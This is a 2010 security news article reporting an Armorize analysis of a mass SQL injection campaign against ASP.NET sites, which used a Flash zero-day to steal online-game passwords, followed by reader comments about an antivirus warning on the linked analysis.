June 14, 2010, 3:37PM

SQL Injection Attacks Aimed at Stealing Gaming Credentials, Experts Say

Follow @DennisF

The mass SQL injection attack that has been ongoing for a week or so now is designed mainly to steal credentials for online games and is quite well planned and organized, experts say.

The attack, which has been using two specific domains as part of a widespread SQL injection campaign, is targeting sites running ASP.Net applications and using the SQL injection technique to compromise the applications and plant malicious code on the back end servers, according to an analysis by researchers at Armorize, a Web application security company.

The vulnerability being used in the attack is a flaw in Adobe Flash, which was publicized earlier this month and patched late last week by Adobe. Here's how the attack works:

Editor's Pick

Server-side:
1. Attack vectors used in mass SQL injections were targeted and specific--pre-scanning took place beforehand, vectors waiting to be used upon availability of 0day.
2. Attacks targeted ASP.NET Web applications vulnerable to SQL injection and using SQL server as database. We note most of the fault is attributed to the vulnerable Web application itself, not IIS or ASP.NET or SQL server.

Client-side:
1. 0day discovered in Asia, by known group, possibly via fuzzing.
2. 0day initially used (and captured) in emails as part of targeted attacks, often against Asian personnels.
3. 0day leveraged in mass SQL injection attempts shortly after POC discovered in the wild.
4. Exploit code involves mechanisms to defeat behavior-based analysis.
5. Exploit generated by CuteQQ / Anhey.

The attack includes some code specifically designed to evade Web application firewalls, and it is being thrown against sites running several different versions of Microsoft's IIS Web server software. The Armorize researchers say that the attacks look to be the work of a group using the name "dnf666," which launched a similar mass SQL injection campaign in March.

"DNF stands for "Dungeon Fighter," a popular online game in the Chinese community. It's offered in Taiwan here and in China on top of the QQ platform here. dnf666.net was a platform selling (illegal) plugins to these online games. Adding these together, it's no surprise that at the end of this article, our conclusion is the purpose of both robint.us and 2677.in attacks were aimed at stealing passwords to online games," they wrote in their analysis.

Commenting on this Article is closed.

Comments

Submitted by Anonymous (not verified) on Mon, 06/14/2010 - 3:06pm.

Your link to armorize's blog set off my avg link scanner and disabled access to the site. Perhaps it is a false positive?

Submitted by Caleb Sima (not verified) on Mon, 06/14/2010 - 11:06pm.

It is. AVG uses signatures. Since the post contains descriptive portions of the malware AVG will flag it. False positive.

Submitted by Anonymous (not verified) on Tue, 06/15/2010 - 8:16am.

Off topic: Definitely not a AVG false positive, there _IS_ what is flaged, more AVs report so. You should better use the malware/malicious javascript snipets as images, not inline-javascript code.

Submitted by Wayne Huang (not verified) on Tue, 06/15/2010 - 12:14pm.

No, nothing is inlined, all javascript code is rendered not executed. The malicious domain is dead anyways.

The code is for others to copy and use as signatures, that's why we're not using images

Today's Most Popular

Most Viewed

Newsletter Sign-up

Take Our Poll

Listen to Latest Podcasts

Follow Threatpost


LinkedIn	Twitter	Tumblr	Facebook

EN US Navigation Bar